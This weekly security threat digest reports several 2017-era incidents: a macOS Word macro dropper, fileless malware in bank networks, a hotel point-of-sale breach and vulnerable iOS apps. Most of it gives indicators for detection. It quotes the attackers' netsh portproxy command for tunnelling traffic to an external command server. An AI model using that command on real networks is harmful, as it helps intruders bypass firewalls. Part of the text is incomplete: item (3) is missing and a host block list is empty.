Here are this week's cyber updates:
(1) Microsoft Office allows its users to add a macro script to be executed when the document is opened. While this is usually used for formulas calculation, attackers have used it to execute malicious code on their victims' workstations, and in particular infecting them with ransomware (such as the Locky ransomware).
Today, the first Word macro for Mac OS was discovered. The malware downloads another file from https://www.securitychecking.org/index.asp and decrypts it (the file is encrypted using RC4 encryption). The malware then executes the decrypted file.
Organizations that use Mac OS systems are requested to check if any machines has queried the following malicious DNS record: www.securitychecking.org
Here are all the details: https://objective-see.com/blog/blog_0x17.html
(2) Numerous worldwide banks have been targeted by a malware stored only in the server's memory. Kaspersky reported to have their incident response team called due to a meterpeter code found in the memory of a bank's domain controller.
What's interesting about this attack is the fact that the attackers have used the netsh.exe utility (builtin tool) in order to tunnel traffic from the victim's host to the attacker's C&C servers. In particular, the following command was used:
netsh interface portproxy add v4tov4 listenport=4444 connectaddress=<IP> connectport=8080 listenaddress=0.0.0.0
This caused the infected machine to listen on port 4444 and send this traffic to <IP> in port 8080.
Thus, this has allowed a legitimate tool (netsh.exe) to be used in order to allow internal workstations and computers to communicate with an external C&C server, even if a direct communication channel between the internal machines and the internet is blocked by the organization's firewall.
Here are some artifacts generated in the Windows registry that will quickly allow an organization to determine if one of their machines was infected:
- HKLM\SYSTEM\ControlSet001\services\ – path will be modified after using the sc.exe utility
- HKLM\SYSTEM\ControlSet001\services\PortProxy\v4tov4\tcp – path will be modified after using the netsh.exe utility
Here are all the details: https://securelist.com/blog/research/77403/fileless-attacks-against-enterprise-networks/, http://thehackernews.com/2017/02/bank-hacking-malware.html
Clients are advised to block access to the following hosts:
Here are all the details: https://badcyber.com/several-polish-banks-hacked-information-stolen-by-unknown-attackers/
(4) Last week I've mentioned the ransomware that targeted an hotel in Austria; this week it was IHG's turn to be infected by a malware. About 12 InterContinental point of sales machines have been hacked, allowing the attackers to gain credit cards data.
The following link lists all infected properties: https://www.ihg.com/content/us/en/customer-care/protecting-our-guests. Be sure to check if you've purchased anything there!
Here are all the details: https://krebsonsecurity.com/2017/02/intercontinental-confirms-breach-at-12-hotels/
(5) 76 famous iOS application are vulnerable to MiTM attacks. Some are very popular, such as Snapchat. The app is vulnerable to MiTM attacks, allowing attackers to still your credentials (username and password).
Here are all the details: https://medium.com/@chronic_9612/76-popular-apps-confirmed-vulnerable-to-silent-interception-of-tls-protected-data-2c9a2409dd1
Stay tuned for more updates,
Head of Offensive Security & Response Unit